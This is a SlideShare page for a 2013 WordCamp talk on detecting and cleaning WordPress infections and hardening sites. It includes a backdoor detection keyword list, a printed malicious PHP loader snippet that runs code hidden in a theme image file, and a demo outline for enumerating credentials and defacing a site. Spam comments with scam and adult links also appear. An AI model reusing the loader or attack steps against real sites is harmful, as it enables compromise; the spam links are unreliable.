Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.
WordPress SecurityDealing with Today’s Hacks
If you don’t ask, you don’t get!      •     Dre Armeda, CISSP      •     CEO, Co-Founder at Sucuri Inc.      •     @dremed...
Why listen to me? You don’t have to, but…• 12 years running IT, IS, Crypto, InfoSec & PhySec for the US Navy.     – Manage...
Thoughts To Kick Things Off• Information Security is about risk reduction.     – If you’re looking for the “silver bullet”...
Know Your Enemy•    They have time & resources•    They are intelligent•    Attacks are automated•    Goal is to impact qu...
Ok, so what’s the problem?TODAY’S ISSUES:• The Ecosystem /  Environment• Access Control• Software Vulnerabilities• Adminis...
Today’s Focus• Ecosystem / Environment• Access Control• Dealing with Hacks1/19/2013         Dre Armeda - @dremeda   #wcphx
Logical Architecture    Linux Operating System                      Apache                                     MySQL     P...
The EcoSystem / Environment• Apache     – Malicious module injects iFrames     – http://blog.unmaskparasites.com/2012/09/1...
The EcoSystem / Environment      • What can you do?            – Not much… completely outside of your control if          ...
Access is Key• We have to change the way we treat and think  about access. All access – Server / Application• We are going...
Before We Dive In1/19/2013        Dre Armeda - @dremeda   #wcphx
WordPress Loving Infections•   Defacements•   Backdoors•   Pharma Hack•   Injections      – iFrame Specifically• Malicious...
Hacktivism at its finest… you now support a cause!?!?!DEFACEMENTS
Defacements• Hacktivism 101      – Annoying as S*&T• Places to look:      – Index.html      – Index.php            • Root ...
It’s ok to cry a little… BACKDOORS
Backdoors• Common terms:    –   Is_bot    –   Eval    –   Base64_decode    –   Fopen    –   Fclose    –   readfile    –   ...
Erectile Dysfunction pills are leading ads.. Who knew.. PHARMA HACK
Pharma Hack• Multi-million $ Business• Rarely Distribute Malware• Impression based Affiliate  Marketing• Google’s Search E...
Pharma Hack, cntd..• Try using CURL to emulate Google and Windows:      Curl –L –A      “Googlebot/2.1(+http://www.google....
Pharma Hack, cntd..1/19/2013         Dre Armeda - @dremeda   #wcphx
It only hurts for a minute…INJECTIONS
Injections• Invisible iFrame’s - Executing on your browser• Contributing to Drive-by-Downloads, Pharma, XSS, CSRF• Places ...
Injections, cntd…      • PHP iFrame Injection =>            – Count##.php            – Check all Index.php /              ...
Injections, cntd…      • Pharma Link        Injections =>      • Drive-By-        Downloads1/19/2013               Dre Arm...
WTF?!?! Why don’t I understand what it says?MALICIOUS REDIRECTS
Malicious Redirects      • Redirects your user to a domain distributing malware,        fundamentally different than an if...
Biggest growing problem, exceptionally difficult to detect…PHISHING
Phishing• Growing at a faster pace than traditional web-  malware• No impact to readers, but tied to SPAM bots  sending ou...
Phishing, cntd…1/19/2013       Dre Armeda - @dremeda   #wcphx
Bringing the Point HomeDEMONSTRATION
Demo Objective•   Use good tools for bad things – wpscan•   Enumerate the users•   Enumrate Passwords•   Own target WordPr...
Remember the risk discussion?KEEPING IT REAL
Update      • Oldest version found in production – 1.5      • Leading cause of cross-site contamination issues      • Perh...
Access is Key• On the Server:       – Kill accounts that are not in use       – FTP is the devil – slap yourself and switc...
Password Dilemma      • 15 character pass            – 3 months to crack      • Long / Complex / Unique            – Key t...
Kill PHP Execution• Kill PHP Execution      – Directories:            • WP-INCLUDES            • WP-CONTENT            • U...
Disable Theme / Plugin EditorI’d take it a step further and remove the ability to install, butthat’s just me.Modify WP-CON...
Plugins That HelpSucuri Clients                         Non-Clients• Sucuri Security Plugin               • Limit Login At...
Need a Hand?  Support Forums                         Online Resources  • Hacked –                             • Sucuri Blo...
Dre Armeda, CISSP                                                                      Dre.im                             ...
Próxima SlideShare
Cargando en…5
×

WordPress Security - WordCamp phoenix 2013

18.161 visualizaciones

Publicado el

WordPress security at WordCamp Phoenix 2013.

  • DOWNLOAD THE BOOK INTO AVAILABLE FORMAT (New Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://urlzs.com/UABbn } ......................................................................................................................... Download Full EPUB Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... Download Full doc Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... Download PDF EBOOK here { https://urlzs.com/UABbn } ......................................................................................................................... Download EPUB Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... Download doc Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THE can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THE is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBOOK .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, CookBOOK, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, EBOOK, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THE Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THE the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THE Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Responder 
    ¿Estás seguro?    No
    Tu mensaje aparecerá aquí
  • If you want to enjoy the Good Life: making money in the comfort of your own home with just your laptop, then this is for YOU... ●●● http://t.cn/AieX2Loq
       Responder 
    ¿Estás seguro?    No
    Tu mensaje aparecerá aquí
  • Dating direct: ♥♥♥ http://bit.ly/2F4cEJi ♥♥♥
       Responder 
    ¿Estás seguro?    No
    Tu mensaje aparecerá aquí
  • Sex in your area is here: ♥♥♥ http://bit.ly/2F4cEJi ♥♥♥
       Responder 
    ¿Estás seguro?    No
    Tu mensaje aparecerá aquí
  • How to use "The Scrambler" ot get a girl obsessed with BANGING you... ◆◆◆ http://t.cn/AiurDrZp
       Responder 
    ¿Estás seguro?    No
    Tu mensaje aparecerá aquí

WordPress Security - WordCamp phoenix 2013

  1. WordPress SecurityDealing with Today’s Hacks
  2. If you don’t ask, you don’t get! • Dre Armeda, CISSP • CEO, Co-Founder at Sucuri Inc. • @dremeda • Dre.im Im a Harley enthusiast, and a Chargers fan. I wear many hats, and love tacos. Im infatuated with WordPress, web design, and web security. I work at Sucuri Security. I hope to help make the web a safer place!1/19/2013 Dre Armeda - @dremeda #wcphx
  3. Why listen to me? You don’t have to, but…• 12 years running IT, IS, Crypto, InfoSec & PhySec for the US Navy. – Managed security awareness for Sempra Energy – Deployed security suite for 1-800-Flowers. – Cleaned Martha Steward web properties of malware• Not an expert, passionate enthusiast.• Seriously though – Quick Sucuri stats: – Remediate 200 – 300 infected websites a day, • 24/7/365 – Perform 2 million + malware website scans a month – Support all CMS platforms and custom applications (e.g., WordPress, Joomla, osCommerce, vBulletin, Drupal, .NET, etc… ) My goal in life is to make the web a safer place!1/19/2013 Dre Armeda - @dremeda #wcphx
  4. Thoughts To Kick Things Off• Information Security is about risk reduction. – If you’re looking for the “silver bullet” this is the wrong talk for you.• To think that you will never be infected is like saying you will never be sick. – Someone tells you different – Percussion calibration time• Prevention is ideal, but not realistic. – Risk will never be 0% – Detection is key.1/19/2013 Dre Armeda - @dremeda #wcphx
  5. Know Your Enemy• They have time & resources• They are intelligent• Attacks are automated• Goal is to impact quantity• Own one, own them all…• It’s not personal 1/19/2013 Dre Armeda - @dremeda #wcphx
  6. Ok, so what’s the problem?TODAY’S ISSUES:• The Ecosystem / Environment• Access Control• Software Vulnerabilities• Administration• Credential Management• Extensibility1/19/2013 Dre Armeda - @dremeda #wcphx
  7. Today’s Focus• Ecosystem / Environment• Access Control• Dealing with Hacks1/19/2013 Dre Armeda - @dremeda #wcphx
  8. Logical Architecture Linux Operating System Apache MySQL PHP WordPress CPANEL Plesk phpMyAdmin PHP-CGI Modules Modules1/19/2013 Dre Armeda - @dremeda #wcphx
  9. The EcoSystem / Environment• Apache – Malicious module injects iFrames – http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module- injects-iframes/• phpMyAdmin – Mirror Hacked – http://sourceforge.net/blog/phpmyadmin-back-door/• PHP-CGI – Remote Code Execution – http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the- wild.html• Plesk – Vulnerable to SQLi attacks – http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to- malware.html 1/19/2013 Dre Armeda - @dremeda #wcphx
  10. The EcoSystem / Environment • What can you do? – Not much… completely outside of your control if you’re using a shared or managed host • But, you can reduce risk... – Use a Dedicated / VPS Environment • But recognize the responsibility that this entails, if you what I mentioned previously doesn’t make sense, skip to next step – Go with a Managed Host • Doesn’t mean you’ll be safer, but it does mean you’ll have resources to lean on1/19/2013 Dre Armeda - @dremeda #wcphx
  11. Access is Key• We have to change the way we treat and think about access. All access – Server / Application• We are going through the same mistakes servers and desktops were making in the 90’s with access.• Know where you are surfing the web, do you really need to log in as an admin at the coffee shop?1/19/2013 Dre Armeda - @dremeda #wcphx
  12. Before We Dive In1/19/2013 Dre Armeda - @dremeda #wcphx
  13. WordPress Loving Infections• Defacements• Backdoors• Pharma Hack• Injections – iFrame Specifically• Malicious Redirects• Phishing1/19/2013 Dre Armeda - @dremeda #wcphx
  14. Hacktivism at its finest… you now support a cause!?!?!DEFACEMENTS
  15. Defacements• Hacktivism 101 – Annoying as S*&T• Places to look: – Index.html – Index.php • Root Directory • Wp-Content • Theme Directory• GREP is your friend: – grep –ri ‘sniper399’ .1/19/2013 Dre Armeda - @dremeda #wcphx
  16. It’s ok to cry a little… BACKDOORS
  17. Backdoors• Common terms: – Is_bot – Eval – Base64_decode – Fopen – Fclose – readfile – Edoced_46esad – Exec – System – Shell_exec – Gzuncompress – popen – FilesMan1/19/2013 Dre Armeda - @dremeda #wcphx
  18. Erectile Dysfunction pills are leading ads.. Who knew.. PHARMA HACK
  19. Pharma Hack• Multi-million $ Business• Rarely Distribute Malware• Impression based Affiliate Marketing• Google’s Search Engine Result Pages (SERP)• Odds of malware distribution are actually low• Tricks: – Embedded within core files – Look for “.tmp” directories = >1/19/2013 Dre Armeda - @dremeda #wcphx
  20. Pharma Hack, cntd..• Try using CURL to emulate Google and Windows: Curl –L –A “Googlebot/2.1(+http://www.google.com/bot.html)” http://someinfectedwebsite.com – Google Webmaster Tools • Fetch as Google Bot• Check your Theme Index.php file for things like this: – <?php $wp__theme_icon=@create_function(”,@file_get_co ntents(‘/public_html/wp-content/themes/my-really- good-theme/images/s.jpg’));$wp__theme_icon(); ?>1/19/2013 Dre Armeda - @dremeda #wcphx
  21. Pharma Hack, cntd..1/19/2013 Dre Armeda - @dremeda #wcphx
  22. It only hurts for a minute…INJECTIONS
  23. Injections• Invisible iFrame’s - Executing on your browser• Contributing to Drive-by-Downloads, Pharma, XSS, CSRF• Places to check – Pages that generate content: – JS files, Header.php, Index.php, Function.php, Footer.php1/19/2013 Dre Armeda - @dremeda #wcphx
  24. Injections, cntd… • PHP iFrame Injection => – Count##.php – Check all Index.php / Theme JS files – Example below:1/19/2013 Dre Armeda - @dremeda #wcphx
  25. Injections, cntd… • Pharma Link Injections => • Drive-By- Downloads1/19/2013 Dre Armeda - @dremeda #wcphx
  26. WTF?!?! Why don’t I understand what it says?MALICIOUS REDIRECTS
  27. Malicious Redirects • Redirects your user to a domain distributing malware, fundamentally different than an iframe injection that executes in your browser • 8 out of 10 times, check your .htaccess file – all of them – # find /var/www –name .htaccess –type f | wc –l • Check for backdoors also – often a sign of a bigger issue1/19/2013 Dre Armeda - @dremeda #wcphx
  28. Biggest growing problem, exceptionally difficult to detect…PHISHING
  29. Phishing• Growing at a faster pace than traditional web- malware• No impact to readers, but tied to SPAM bots sending out emails like this:1/19/2013 Dre Armeda - @dremeda #wcphx
  30. Phishing, cntd…1/19/2013 Dre Armeda - @dremeda #wcphx
  31. Bringing the Point HomeDEMONSTRATION
  32. Demo Objective• Use good tools for bad things – wpscan• Enumerate the users• Enumrate Passwords• Own target WordPress site• Deface the Website I have 5 minutes – Ready?1/19/2013 Dre Armeda - @dremeda #wcphx
  33. Remember the risk discussion?KEEPING IT REAL
  34. Update • Oldest version found in production – 1.5 • Leading cause of cross-site contamination issues • Perhaps the simplest of tasks, yet we still find this:1/19/2013 Dre Armeda - @dremeda #wcphx
  35. Access is Key• On the Server: – Kill accounts that are not in use – FTP is the devil – slap yourself and switch to SFTP – Disable password auth & use key pairs• WordPress Admin: – Multi-Factor Authentication on wp-admin – Two-Factor Authentication on wp-login.php• Employ least privileged: – Only use admin accounts for admin tasks – Learn to use Editor, Author, Contributor, Subscriber1/19/2013 Dre Armeda - @dremeda #wcphx
  36. Password Dilemma • 15 character pass – 3 months to crack • Long / Complex / Unique – Key to Passwords • Prefer Password Manager – You don’t? ok.. – Passphrases work too • iLuvWCLpHX:2013:S@nT@N b@By • Come up with a process & stick to it: – One scheme: • Remember 8 characters • Write Down 8 characters • Save 20 characters – Second scheme: • Remember 20 characters • Prefix characters with site name • End sequence with some date1/19/2013 Dre Armeda - @dremeda #wcphx
  37. Kill PHP Execution• Kill PHP Execution – Directories: • WP-INCLUDES • WP-CONTENT • UPLOADS – At a minimum <Files *.php> Deny from all </Files>1/19/2013 Dre Armeda - @dremeda #wcphx
  38. Disable Theme / Plugin EditorI’d take it a step further and remove the ability to install, butthat’s just me.Modify WP-CONFIG.PHP With:• Disable the Plugin / Theme Editor – Define(‘DISALLOW_FILE_EDIT’,true); - OR -• Disable the Plugin / Theme Update and Installation – Define(‘DISALLOW_FILE_MODS’,true);1/19/2013 Dre Armeda - @dremeda #wcphx
  39. Plugins That HelpSucuri Clients Non-Clients• Sucuri Security Plugin • Limit Login Attempts• Theme-Check • Theme-Check• BackupBuddy • BackupBuddy• Akismet • Akismet1/19/2013 Dre Armeda - @dremeda #wcphx
  40. Need a Hand? Support Forums Online Resources • Hacked – • Sucuri Blog: http://wordpress.org/tags/ http://blog.sucuri.net hacked • SiteCheck Scanner: http://sitecheck.sucuri.net • Unmask Parasites: • Malware – http://unmaskparasites.com http://wordpress.org/tags/ • Perishable Press: malware http://perishablepress.com/ca tegory/web-design/security/ • Secunia Security Advisories: • BadwareBusters – http://secunia.com/communit https://badwarebusters.org y/advisories/search/?search= wordpress1/19/2013 Dre Armeda - @dremeda #wcphx
  41. Dre Armeda, CISSP Dre.im @dremeda Sucuri Inc. http://sucuri.net http://blog.sucuri.net @sucuri_security Thanks to Tony Perez @perezbox for allowing me to cannibalize his slide deck.1/19/2013 Dre Armeda - @dremeda #wcphx

×